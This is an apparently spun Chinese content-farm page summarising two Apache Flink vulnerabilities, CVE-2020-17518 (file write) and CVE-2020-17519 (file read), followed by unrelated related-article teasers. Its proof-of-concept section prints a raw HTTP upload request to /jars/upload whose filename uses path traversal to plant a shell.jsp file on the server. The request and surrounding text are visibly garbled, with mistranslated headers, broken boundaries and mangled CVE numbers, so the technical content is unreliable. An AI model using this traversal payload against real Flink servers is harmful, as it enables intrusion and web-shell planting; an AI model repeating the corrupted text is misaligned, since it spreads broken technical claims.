Apache Flink POC漏洞示例分析CVE-2020-17518/17519

技术Apache Flink POC漏洞CVE-2020-17518/17519的示例分析今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解

今天跟大家聊聊Apache Flink POC漏洞CVE-2020-17518/17519的实例分析,可能很多人不太了解。为了让大家更好的了解,边肖为大家总结了以下内容,希望大家能从这篇文章中有所收获。

CVE-2020-175183360文件写入

使用REST API,攻击者可以修改HTTP头并将上传的文件写入本地文件系统的任何位置(Flink 1.5.1进程可以访问)

CVE-2020-175193360文件读取

Apache Flink 1.11.0允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(可由JobManager进程访问)。

概念验证:

POST/jars/upload HTTP/1.1host : IP :8081 Accept-encoging : gzip,pinaceaccept : */* Accept-language : enUser-agent : Mozilla/5.0(Windows NT 10.0;Win64x64)applebwebkit/537.36(KHTML,像Gecko)Chrome/87 . 0 . 4280 . 88 Safari/537.36 connection : closeContent-type : multipart/form-data;boundary=-webkitformboundaryoz89r 6 ycontent-length : 189-webkitformboundaryoz8mknrrs89r 6 ycontent-disposition :表单-数据;name=' jarfile文件名='././././././etc/shell . JSP ' success-webkitformboundaryoz8 meknrso 89 r6y-

看完以上内容,你对Apache Flink POC漏洞CVE-2020-17518/17519的样本分析有更好的理解吗?如果您想了解更多知识或相关内容,请关注行业资讯频道,感谢您的支持。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/155656.html

(0)

相关推荐

  • 仿照Bootstrap的input如何修改upload上传图片的样式

    技术仿照Bootstrap的input如何修改upload上传图片的样式这篇文章将为大家详细讲解有关仿照Bootstrap的input如何修改upload上传图片的样式,小编觉得挺实用的,因此分享给大家做个参考,希望大家

    攻略 2021年11月19日
  • 抖音刷赞网,抖音可以刷赞吗

    技术抖音刷赞网,抖音可以刷赞吗对于抖音的新手来说,可以给自己的作品,适当的刷一些赞,进行抖音刷赞,这样由于点赞量过高,就会被推上热门,他上热门之后,就会有很多的粉丝,看到自己的视频,就会有人自发的给自己点赞,这样一来,播

    测评 2021年10月26日
  • 如何用html5绘制表格

    技术如何用html5绘制表格如何用html5绘制表格,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。表格一般通过3个标签来构建,分别为表格标签,行标签和单

    攻略 2021年11月25日
  • html盒子模型由什么组成(html盒子模型具有哪些内容)

    技术html的盒子模型有哪些本篇内容主要讲解“html的盒子模型有哪些”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“html的盒子模型有哪些”吧!

    攻略 2021年12月23日
  • 博士今义,“博士”一词的古今异义怎么讲

    技术博士今义,“博士”一词的古今异义怎么讲博士博士今义,古义为官名。秦汉时是掌管书籍文典、通晓史事的官职。 今义为学术上专通一经或精通一艺、从事教授生徒的官职。如明代初期,朱允炆曾封方孝孺为“文学博士”等。 “博士”最早

    生活 2021年10月25日
  • tensorflow 数据扩增随机变换(tensorflow手写识别如何保存模型)

    技术tensorflow中tf.matrix_diag和tf.matrix_inverse的用法tensorflow中tf.matrix_diag和tf.matrix_inverse的用法,很多新手对此不是很清楚,为了帮

    攻略 2021年12月22日